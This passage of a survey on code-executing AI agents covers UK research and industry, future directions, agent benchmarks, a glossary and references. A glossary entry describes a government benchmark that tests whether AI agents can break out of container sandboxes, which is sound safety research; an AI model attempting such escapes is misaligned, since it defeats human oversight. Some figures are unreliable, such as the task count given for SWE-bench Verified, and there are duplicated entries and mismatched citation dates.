Imperial College London — Agentic AI Centre and Industrial Partnership: Imperial partnered with Lenovo in 2026 to establish the London AI Technology Centre at its White City Deep Tech Campus, which focuses on foundation model deployment and agentic AI systems with safe code execution as a primary research direction. Imperial’s Software Systems group also contributes to research on automated program repair — using code execution loops to verify that LLM-generated patches actually fix the bugs they target, an empirical validation methodology that complements formal verification approaches.
University of Cambridge Computer Laboratory: Cambridge contributes theoretical foundations for the intersection of code execution and formal verification. The programming languages research group works on type-theoretic frameworks for reasoning about the safety of code executed within sandboxed environments, connecting the operational semantics tradition (Plotkin, Milner) with practical sandboxing guarantees. Cambridge is also a partner institution in the UKRI generative AI hub focused on trustworthy AI code generation and execution.
Northern England Industrial Context: The UK’s manufacturing and logistics sectors in the North are emerging early adopters of code-executing AI agents for industrial process automation. Sheffield’s Advanced Manufacturing Research Centre (AMRC) is piloting code-executing agents that write and run Python simulation scripts to optimise CNC machining parameters, using execution-verified simulation outcomes rather than language-model predictions to guide manufacturing process improvements. Manchester’s digital sector — the third-largest technology cluster in the UK after London and Cambridge — has financial services and logistics firms deploying code execution agents for automated data pipeline repair, log analysis, and anomaly detection workflows. Leeds Digital Festival (annual) has featured agent code execution as a key showcase theme since 2024, with multiple attendee companies reporting production deployments. Newcastle-based engineering services firms have explored code-executing agents for automated electrical systems documentation generation from circuit diagrams and specifications.
UK AI Safety Institute and Regulatory Framework: The UK AI Safety Institute (AISI, now organised under the Department for Science, Innovation and Technology’s AI Safety Directorate) published guidance in 2025 on safe sandbox architectures for frontier AI agents, establishing minimum isolation requirements — mandating at minimum Linux namespace and cgroup isolation for non-critical applications, and recommending Firecracker microVM or gVisor isolation for any agent operating on sensitive data or with access to production systems. The UK’s AI regulation framework consultation (2025-2026) specifically addresses AI systems that autonomously execute code in critical national infrastructure, with forthcoming statutory requirements for logging, human-override capability, and sandboxing certification expected by 2027.
UK Startup Ecosystem: Several UK-backed or UK-founded startups are active in the code execution infrastructure space. Augment Code (US-founded, UK research presence) focuses on developer experience for code-executing agents. Multiple YC-backed companies with UK engineering teams are building on top of E2B and Modal managed execution APIs to deliver vertical-specific code execution agents for legal, scientific, and financial services domains.
Future Directions (2026-2030)
Persistent Stateful Execution Environments with Version Control: Current production sandboxes are predominantly ephemeral or offer only simple session persistence. The next generation will provide long-lived, version-controlled execution environments where every agent action is automatically git-committed with a structured commit message, enabling time-travel debugging (replay any prior execution step), branching (explore alternative solution paths from a checkpoint), and collaborative multi-agent access to a shared computational workspace — where one agent’s file edits are immediately visible to other agents working in the same repository tree. This parallels the development of collaborative software development environments for human teams (GitHub, GitLab codespaces) applied to agent workflows.
Speculative Execution for Agent Planning: Analogous to speculative execution in CPU pipeline design — where processors execute multiple candidate instruction paths before knowing which branch will be taken — agentic systems will execute multiple candidate code plans in parallel across separate sandbox instances, evaluating their outcomes simultaneously and committing only the best result. This approach exchanges compute cost for latency reduction in the critical path of agent task completion, enabling agents to explore a branching solution space concurrently rather than sequentially. Early implementations using LangGraph’s parallel node execution and tree-of-thought-style planning are already in research prototypes.
Multi-Modal Execution Environments: The next generation of code execution sandboxes will support full multi-modal output capture: rendered GUI screenshots from headless browser execution (enabling agents to interact with and test web applications), audio waveform outputs from audio processing pipelines, video frame sequences from computer vision pipelines, and 3D visualisation outputs from scientific simulation. This will enable code-executing agents to perform visual regression testing of UI changes, validate audio generation quality, and interpret scientific visualisations — extending code execution from pure text-output processes to multi-modal computational environments.
Formal Verification Integration: Combining code execution with lightweight formal verification so that agent-written code is not only tested empirically through execution (which can only establish correctness for the tested cases) but symbolically verified against formal correctness properties using bounded model checking, type checking with effect systems, or property-based testing with formal coverage proofs. Early research combining execution-based testing with Lean 4 proof generation shows that LLMs capable of writing code can, with appropriate prompting, also write corresponding formal verification proofs — potentially enabling execution of code certified correct before deployment to critical systems.
Agent-Native Programming Languages and Runtimes: Purpose-built programming languages and runtime environments optimised for LLM-generated code patterns rather than human-authored code. Human-authored code benefits from readability, complex abstraction hierarchies, and long-lived maintainability; LLM-generated code for agent execution typically needs only single-execution correctness, structured output, and robust error handling. Agent-native runtimes might embed structured logging into the language semantics (every print becomes structured JSON), automatic resource limiting as a runtime property rather than an external enforcement layer, and built-in sandboxing via a capability-based security model (code can only access resources explicitly passed as parameters).
Regulatory and Certification Infrastructure: As AI code execution systems become integrated into healthcare, financial services, legal processing, and government operations, a certification infrastructure will emerge. For the EU under the AI Act (high-risk classification for code execution in critical infrastructure), conformity assessment bodies will audit sandboxing implementations, logging systems, and human-override mechanisms. The UK, post-Brexit, is expected to develop its own equivalent framework under the DSIT AI Safety Directorate, with mutual recognition arrangements for certifications covering the major EU and US markets. This regulatory convergence will drive standardisation of sandboxing APIs and security audit frameworks across the code execution infrastructure industry.
Benchmark Datasets and Evaluation
Code execution capability in AI agents is evaluated through a hierarchy of benchmarks of increasing difficulty and real-world fidelity. Unlike pure Code Generation benchmarks (which evaluate generated text as a static artefact), code execution benchmarks require agents to close the generation-execution feedback loop and demonstrate iterative problem-solving capability in live environments.
SWE-bench Verified (Jimenez et al., 2023; Chowdhury et al., 2024): The canonical benchmark for software engineering agent capability, directly measuring code execution loop quality. Agents are given a natural language issue description and a GitHub repository, and must generate a patch through exploration, code execution (running tests, reading files, observing outputs), and iterative revision that resolves the issue as confirmed by the existing test suite. The “Verified” variant curates 2,294 high-quality tasks from 12 popular Python repositories, audited for problem clarity and solvability. Top systems: Claude Code + Opus 4.6 at 80.8%, OpenHands + Claude Sonnet 4.5 at 72%+, with provisional next-generation scores approaching 93.9%. Performance directly tracks code execution loop quality — models that reliably parse error messages and iterate outperform those that generate once.
Terminal-Bench (2025): Evaluates agents on realistic command-line interface tasks including system administration, environment configuration, package management, git operations, CI/CD debugging, and file processing workflows — tasks that require the agent to plan multi-step Bash shell command sequences, interpret output, and adapt across 10-30 execution steps. Reflects the real-world CLI usage patterns of software engineering agents. Top models score 77-83% as of 2026.
OSWorld (Agashe et al., 2024, NeurIPS): Benchmarks multimodal agents operating real computer environments via screenshot observation, mouse/keyboard action, and code execution. Requires both visual perception of GUI state and code/command execution to interact with desktop applications — Excel, Chrome, LibreOffice, VS Code. Represents the most challenging and realistic agent evaluation context, requiring the full integration of multi-modal perception with code execution grounding.
AgentBench (Liu et al., 2024, ICLR): A multi-dimensional benchmark covering eight diverse agent task categories: OS shell tasks, database management (SQL execution), knowledge graph queries (SPARQL), web browsing, web shopping, game-based reasoning, and house-holding tasks — assessing generalised agent code execution capability across heterogeneous digital environments.
MINT-Bench (Wang et al., 2023): Evaluates LLMs with tool use (including code execution) in multi-turn interactive settings with up to five tool invocations per problem, measuring the compounding quality improvement from iterative observation and action over multiple execution steps — specifically quantifying how much agents improve from execution feedback versus generating solutions purely in context.
InterCode (Yang et al., 2023): A benchmark specifically designed to evaluate interactive code execution quality across SQL (natural language to database queries with execution feedback) and Bash (file management and system administration tasks with shell execution feedback), measuring how well agents exploit execution environment interactivity.
SciCode (Huang et al., 2024): Benchmarks code generation and execution for scientific computing tasks drawn from materials science, physics, and chemistry research — requiring agents to write and execute numerical simulation code, parse scientific output, and produce correct quantitative results, often across multi-step pipeline tasks involving multiple library calls and intermediate result interpretation.
Key Terminology
-
REPL (Read-Eval-Print Loop): The classical interactive computational environment originating with Lisp (1960) that prefigures agent code execution: read expression, evaluate, print result, repeat. Modern AI agent code execution is a generalised, sandboxed, LLM-driven REPL.
-
Sandboxed Execution: Code executed within an isolated runtime environment that restricts access to host OS resources, network, and filesystem — the core security mechanism enabling safe deployment of LLM-generated code.
-
Execution Timeout: A maximum wall-clock duration for a single code execution step, typically 30-300 seconds, enforced by the sandbox orchestrator to prevent infinite loops or runaway computation.
-
MicroVM: A minimal virtual machine (using Firecracker) that provides hardware-level kernel isolation with faster boot times and lower memory footprint than full VMs — the preferred isolation primitive for high-security agent code execution.
-
gVisor: Google’s user-space kernel interposition sandbox, intercepting syscalls from containerised code and re-implementing them safely, providing stronger isolation than standard containers without full VM overhead.
-
CodeAct: The action-space formalism (Wang et al., 2024) establishing Python as the universal agent action interface, enabling multi-step tool use within single executable blocks.
-
Execution Trace: The complete record of a code execution step — submitted code, stdout output, stderr output, exit code, execution time, memory usage — used as the observation that conditions the next agent generation step.
-
Persistent Sandbox Session: An execution environment maintained between multiple agent action steps, preserving filesystem state, installed packages, and environment variables across code executions within a single task session.
-
Trusted Computing Base (TCB): The minimal set of hardware, firmware, and software components whose correct operation is necessary and sufficient for a security guarantee. In code execution sandboxing, reducing the TCB (e.g., by using Firecracker’s minimal VMM rather than a full QEMU emulator) reduces the attack surface for sandbox escape.
-
Jailer (Firecracker): The companion process in Firecracker’s security model that sets up a restricted Linux environment using cgroups and namespaces before launching the Firecracker VMM process itself, then drops privileges — providing defence-in-depth so that even a compromised VMM cannot escalate to host privileges.
-
SandboxEscapeBench: The UK AI Security Institute’s (AISI) 2026 benchmark for evaluating whether frontier AI agents can break out of containerised execution environments, covering 18 escape scenarios across orchestration, runtime, and kernel layers, implemented as capture-the-flag challenges within the Inspect evaluation framework.
-
Confinement Property: The formal security property of a sandboxed execution system stating that for any code submitted to execution, the resulting environment state is guaranteed to remain within the set of admissible states (S_safe). Practically equivalent to the absence of sandbox escape vulnerabilities.
-
Execution Trace: The complete record of a code execution step — submitted code, stdout output, stderr output, exit code, execution time, memory usage — used as the observation that conditions the next agent generation step.
-
Kata Containers: A container runtime that uses lightweight virtual machines to provide hardware-level isolation behind a standard OCI container interface, offering a middle path between Docker’s namespace isolation and Firecracker’s full-microVM isolation. Adopted by Daytona as its enterprise compliance isolation option.
-
Agent-Computer Interface (ACI): The structured command interface design through which a code-executing agent interacts with its execution environment — covering the command set, output format, error message design, and file access patterns. Introduced by Yang et al. (2024) in the SWE-agent paper; shown to substantially impact agent task resolution rates independently of the underlying LLM capability.
Research & Literature
- Wang, X., et al. (2024). “CodeAct: Executable Code Actions Elicit Better LLM Agents.” Proceedings of ICLR 2025. https://arxiv.org/abs/2402.01030
- Wang, X., et al. (2024). “OpenHands: An Open Platform for AI Software Developers as Generalist Agents.” Proceedings of ICLR 2025. https://arxiv.org/abs/2407.16741
- Yang, J., et al. (2024). “SWE-agent: Agent-Computer Interfaces Enable Automated Software Engineering.” NeurIPS 2024. https://arxiv.org/abs/2405.15793
- Yao, S., et al. (2022). “ReAct: Synergizing Reasoning and Acting in Language Models.” ICLR 2023. https://arxiv.org/abs/2210.03629
- Gao, L., et al. (2022). “PAL: Program-Aided Language Models.” ICML 2023. https://arxiv.org/abs/2211.10435
- Nakano, R., et al. (2021). “WebGPT: Browser-Assisted Question-Answering with Human Feedback.” arXiv. https://arxiv.org/abs/2112.09332
- Chen, M., et al. (2021). “Evaluating Large Language Models Trained on Code.” arXiv (Codex). https://arxiv.org/abs/2107.03374
- Devlin, J., et al. (2017). “RobustFill: Neural Program Learning under Noisy I/O.” ICML 2017. https://arxiv.org/abs/1703.07469
- Gulwani, S. (2011). “Automating String Processing in Spreadsheets using Input-Output Examples.” POPL 2011. ACM SIGPLAN Notices, 46(1), 317-330.
- Mnih, V., et al. (2015). “Human-level Control through Deep Reinforcement Learning.” Nature, 518(7540), 529-533.
- Wright, A. K., & Felleisen, M. (1994). “A Syntactic Approach to Type Soundness.” Information and Computation, 115(1), 38-94.
- Plotkin, G. D. (1981). “A Structural Approach to Operational Semantics.” Technical Report DAIMI FN-19, Aarhus University.
- Agashe, P., et al. (2024). “OSWorld: Benchmarking Multimodal Agents for Open-Ended Tasks in Real Computer Environments.” NeurIPS 2024. https://arxiv.org/abs/2404.07972
- E2B Team (2025). “E2B: Developer-First Sandboxed Code Execution for AI Agents.” Technical Documentation. https://e2b.dev/docs
- AWS (2018). “Firecracker: Lightweight Virtualization for Serverless Applications.” NSDI 2020. https://www.usenix.org/conference/nsdi20/presentation/agache
- Google (2019). “gVisor: Sandboxed Container Runtime.” Technical Report. https://gvisor.dev
- Shen, Y., et al. (2024). “HuggingGPT: Solving AI Tasks with ChatGPT and its Friends in Hugging Face.” NeurIPS 2023. https://arxiv.org/abs/2303.17580
- Parisi, A., et al. (2022). “TALM: Tool Augmented Language Models.” arXiv. https://arxiv.org/abs/2205.12255
- Schick, T., et al. (2023). “Toolformer: Language Models Can Teach Themselves to Use Tools.” NeurIPS 2023. https://arxiv.org/abs/2302.04761
- Liu, B., et al. (2024). “AgentBench: Evaluating LLMs as Agents.” ICLR 2024. https://arxiv.org/abs/2308.03688
- Huang, D., et al. (2024). “EvoEval: Evolving Coding Benchmarks via LLM.” arXiv. https://arxiv.org/abs/2403.19114
- Jimenez, C. E., et al. (2024). “SWE-bench: Can Language Models Resolve Real-World GitHub Issues?” ICLR 2024. https://arxiv.org/abs/2310.06770
- Anthropic (2024). “Claude Code: Terminal-First Agentic Coding.” Product Launch Documentation. https://www.anthropic.com/claude-code
- Modal Labs (2025). “Secure Sandboxed Python Execution for AI Workloads.” Technical Documentation. https://modal.com/docs/guide/sandbox
- UCL Engineering (2026). “UCL Computer Science researchers awarded Google funding for AI and online safety.” UCL News. https://www.ucl.ac.uk/engineering/news/2026/feb/ucl-computer-science-researchers-awarded-google-funding-ai-and-online-safety
- FutureScot (2025). “Edinburgh’s CodeClan launches applied agentic AI programme in UK first.” https://futurescot.com/codeclan-launches-applied-agentic-ai-programme-in-uk-first/
- Spheron Network (2025). “AI Agent Code Execution Sandboxes on GPU Cloud.” Technical Blog. https://www.spheron.network/blog/ai-agent-code-execution-sandbox-e2b-daytona-firecracker/
- AISI (2026). “Can AI agents escape their sandboxes? A benchmark for safely measuring container breakout capabilities.” UK AI Security Institute Research. https://www.aisi.gov.uk/blog/can-ai-agents-escape-their-sandboxes-a-benchmark-for-safely-measuring-container-breakout-capabilities